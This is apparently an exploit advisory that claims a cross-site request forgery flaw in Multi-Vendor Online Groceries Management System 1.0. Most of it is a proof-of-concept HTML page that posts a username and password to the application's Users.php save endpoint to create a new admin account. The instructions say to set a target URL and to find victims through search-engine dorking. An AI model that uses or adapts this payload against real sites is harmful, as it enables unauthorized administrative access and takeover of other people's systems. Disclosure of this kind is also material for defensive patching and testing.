=============================================================================================================================================
| # Title     : Multi-Vendor Online Groceries Management System 1.0 CSRF Vulnerability                                                      |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/mvogms_2.zip                                          |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This payload add new admin user .

[+] save payload as poc.html 

[+] line 27 Set your target url

[+] payload : 

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>User Registration</title>
</head>
<body>

    <h2>User Registration</h2>
    <form id="userForm" enctype="multipart/form-data">
        <label for="username">Username:</label>
        <input type="text" id="username" name="username" required><br><br>

        <label for="password">Password:</label>
        <input type="password" id="password" name="password" required><br><br>

        <input type="button" value="Save User" onclick="saveUser()">
    </form>

    <script>
        function saveUser() {
            var form = document.getElementById('userForm');
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();
            xhr.open("POST", "http://localhost/mvogms/classes/Users.php?f=save", true);

            xhr.onload = function () {
                if (xhr.status === 200) {
                    alert('User saved successfully');
                } else {
                    alert('An error occurred while saving the user');
                }
            };

            xhr.send(formData);
        }
    </script>

</body>
</html>

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================